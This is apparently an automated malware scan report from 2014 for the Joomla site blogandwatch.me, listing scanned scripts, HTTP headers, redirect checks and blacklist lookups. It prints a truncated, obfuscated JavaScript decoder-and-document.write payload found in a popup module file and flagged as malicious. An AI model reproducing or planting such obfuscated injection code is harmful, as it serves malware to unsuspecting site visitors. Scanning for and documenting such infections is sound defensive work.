Scanned pages/files
Request | Server response | Status |
http://blogandwatch.me/ | 200 OK Content-Length: 115037 Content-Type: text/html | clean |
http://blogandwatch.me/media/system/js/mootools-core-uncompressed.js | 200 OK Content-Length: 160494 Content-Type: application/javascript | clean |
http://blogandwatch.me/media/system/js/core-uncompressed.js | 200 OK Content-Length: 13476 Content-Type: application/javascript | clean |
http://blogandwatch.me/media/system/js/caption-uncompressed.js | 200 OK Content-Length: 1504 Content-Type: application/javascript | clean |
http://blogandwatch.me/media/system/js/mootools-more-uncompressed.js | 200 OK Content-Length: 303491 Content-Type: application/javascript | clean |
http://blogandwatch.me/templates/traction/js/s5_flex_menu.js | 200 OK Content-Length: 63744 Content-Type: application/javascript | clean |
http://serving.xxxwebtraffic.com/showAd.php?nid=3&pid=13487&adtype=7&sid=13053 | 200 OK Content-Length: 1765 Content-Type: application/x-javascript | clean |
http://ads.juicyads.com/jsclients/jac.js | 200 OK Content-Length: 91344 Content-Type: application/x-javascript | clean |
http://blogandwatch.me/modules/mod_jt_popup_balloon/assets/mod_jt_popup_balloon.js | 200 OK Content-Length: 2297 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}dF('%297Gwgvmtx%2964perkyeki%297H%2966nezewgvmtx%2966%297I%294Ejyrgxmsr%2964wls%7B%296%3C%296%3D%29%3BFmj%296%3CtstWtiih%297H%297H544%296%3D%29%3BFgyvLimklx%297Hqe%7CLimklx/5%29%3BHipwi%29%3BFgyvLimklx/%297H6%29%3BHmj%296%3CgyvLimklx%297Iqe%7CLimklx%296%3D%29%3BFgpievMrxivzep%296%3CMrxivzepMh%296%3D%297Fmj%296%3Ce Antivirus reports:
| ||
http://popunder.fpctraffic.com/pop.js | 200 OK Content-Length: 4768 Content-Type: application/javascript | clean |
http://blogandwatch.me/templates/traction/js/lazy_load.js | 200 OK Content-Length: 5858 Content-Type: application/javascript | clean |
http://blogandwatch.me/templates/traction/js/s5_columns_equalizer.js | 200 OK Content-Length: 17762 Content-Type: application/javascript | clean |
http://blogandwatch.me/index.php/login | 500 Internal Server Error Content-Length: 0 Content-Type: text/html | clean |
http://blogandwatch.me/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://blogandwatch.me/index.php/2013-09-14-00-25-24/most-viewed | 500 Internal Server Error Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: blogandwatch.me
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Wed, 16 Apr 2014 22:22:41 GMT
Pragma: no-cache
Server: Apache/2.4.7 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c0bd8eea2991a5d9326d4dafd88bfebe=950a26a289de448b1d9e563484f60784; path=/
X-Powered-By: PHP/5.4.26
GET / HTTP/1.1
Host: blogandwatch.me
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Wed, 16 Apr 2014 22:22:41 GMT
Pragma: no-cache
Server: Apache/2.4.7 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c0bd8eea2991a5d9326d4dafd88bfebe=950a26a289de448b1d9e563484f60784; path=/
X-Powered-By: PHP/5.4.26
Second query (visit from search engine):
GET / HTTP/1.1
Host: blogandwatch.me
Referer: http://www.google.com/search?q=blogandwatch.me
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: blogandwatch.me
Referer: http://www.google.com/search?q=blogandwatch.me
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=blogandwatch.me
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://blogandwatch.me/
Result: blogandwatch.me is not infected or malware details are not published yet.
Result: blogandwatch.me is not infected or malware details are not published yet.